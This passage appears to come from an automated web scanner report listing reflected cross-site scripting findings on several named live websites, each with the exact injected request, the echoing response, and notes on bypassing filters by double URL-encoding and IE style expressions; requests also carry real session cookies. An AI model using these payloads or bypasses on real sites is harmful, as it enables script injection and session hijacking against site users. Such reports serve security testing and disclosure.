The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5920<script>alert(1)</script>3a1fd1c46c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-postratings/postratings-js.jsd5920<script>alert(1)</script>3a1fd1c46c0?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:11 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.jsd5920<script>alert(1)</script>3a1fd1c46c0?ver=1.50 </strong>
...[SNIP]...

2.70. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89904<script>alert(1)</script>cf6980bae05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content89904<script>alert(1)</script>cf6980bae05/themes/AndroidTappv3/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:40 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:40 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:40 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: dd4e1e5189f7d24b8a1efc32236f52a6
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content89904<script>alert(1)</script>cf6980bae05/themes/AndroidTappv3/favicon.ico </strong>
...[SNIP]...

2.71. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 683ba<script>alert(1)</script>21824087c86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes683ba<script>alert(1)</script>21824087c86/AndroidTappv3/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:59 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:59 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:59 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 36dd09b715c1eefd82c01bd628567586
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes683ba<script>alert(1)</script>21824087c86/AndroidTappv3/favicon.ico </strong>
...[SNIP]...

2.72. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5114<script>alert(1)</script>a047f7fb5cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/AndroidTappv3c5114<script>alert(1)</script>a047f7fb5cd/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:17:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:17:28 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:17:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 7c49d5b1c78130d3483e8bbf6f032964
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes/AndroidTappv3c5114<script>alert(1)</script>a047f7fb5cd/favicon.ico </strong>
...[SNIP]...

2.73. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ad5e3<script>alert(1)</script>34d787bfa65 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/AndroidTappv3/favicon.icoad5e3<script>alert(1)</script>34d787bfa65 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:17:39 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:17:39 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:17:39 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 30ab6cbf9904a435a453766c8d6230bb
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.icoad5e3<script>alert(1)</script>34d787bfa65 </strong>
...[SNIP]...

2.74. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload de962<script>alert(1)</script>2c358430fe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesde962<script>alert(1)</script>2c358430fe4/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:39 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includesde962<script>alert(1)</script>2c358430fe4/js/jquery/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.75. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11d62<script>alert(1)</script>38a46498964 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js11d62<script>alert(1)</script>38a46498964/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:56 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js11d62<script>alert(1)</script>38a46498964/jquery/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.76. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d4bf8<script>alert(1)</script>90010bbd65f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryd4bf8<script>alert(1)</script>90010bbd65f/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:18 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js/jqueryd4bf8<script>alert(1)</script>90010bbd65f/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.77. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5873b<script>alert(1)</script>f3b26b81f90 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.js5873b<script>alert(1)</script>f3b26b81f90?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:36 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js/jquery/jquery.js5873b<script>alert(1)</script>f3b26b81f90?ver=1.4.2 </strong>
...[SNIP]...

2.78. http://www.androidtapp.com/wp-login.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b764<script>alert(1)</script>923e80a7fe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-login.php9b764<script>alert(1)</script>923e80a7fe9 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:32 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<strong> http://www.androidtapp.com/wp-login.php9b764<script>alert(1)</script>923e80a7fe9
</strong>
...[SNIP]...

2.79. http://www.autobytel.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3b1c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252214f4c67906f was submitted in the REST URL parameter 1. This input was echoed as a3b1c"style="x:expression(alert(1))"14f4c67906f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoa3b1c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252214f4c67906f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autobytel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 21068
Vary: Accept-Encoding
Expires: Fri, 01 Apr 2011 15:44:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:44:30 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.188CKMMJ; path=/
Set-Cookie: USER_UUID_VCH=B1598B1E%2DB431%2DED31%2DDDF297B3771F1069;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D04%2D01%2008%3A43%3A30%27%7D;path=/
Set-Cookie: COUNT=1;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D04%2D01%2012%3A44%3A30%27%7D;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/favicon.icoa3b1c"style="x:expression(alert(1))"14f4c67906f/">
...[SNIP]...

2.80. http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beatthetraffic.com
Path:   /widgets/traveltimes.aspx

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e2"style%3d"x%3aexpression(alert(1))"46455cc9323 was submitted in the partner parameter. This input was echoed as 4e8e2"style="x:expression(alert(1))"46455cc9323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork4e8e2"style%3d"x%3aexpression(alert(1))"46455cc9323&inrix=1&items=3&link=&code=0&ts=4&rc=false HTTP/1.1
Host: www.beatthetraffic.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=904
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9702
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
p3p: CP="CAO CONi ONL OUR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=51oeeyvyrlq5wommjsu3cvem; path=/; HttpOnly
Date: Fri, 01 Apr 2011 18:11:28 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Beat the Traffic - Drive Times</title>
       <LINK
...[SNIP]...
<link href="/css/TWC_NewYork4e8e2"style="x:expression(alert(1))"46455cc9323.css" type="text/css" rel="stylesheet">
...[SNIP]...

2.81. http://www.cambridge.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e was submitted in the REST URL parameter 1. This input was echoed as 41430<script>alert(1)</script>96756d9915e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cambridge.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:20:01 GMT
Content-Length: 7320
Connection: close
Set-Cookie: ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; path=/
Set-Cookie: X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>favicon.ico41430<script>alert(1)</script>96756d9915e</b>
...[SNIP]...

2.82. http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/404_error.asp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7de6f%253cscript%253ealert%25281%2529%253c%252fscript%253ea0646ab12cc was submitted in the REST URL parameter 2. This input was echoed as 7de6f<script>alert(1)</script>a0646ab12cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

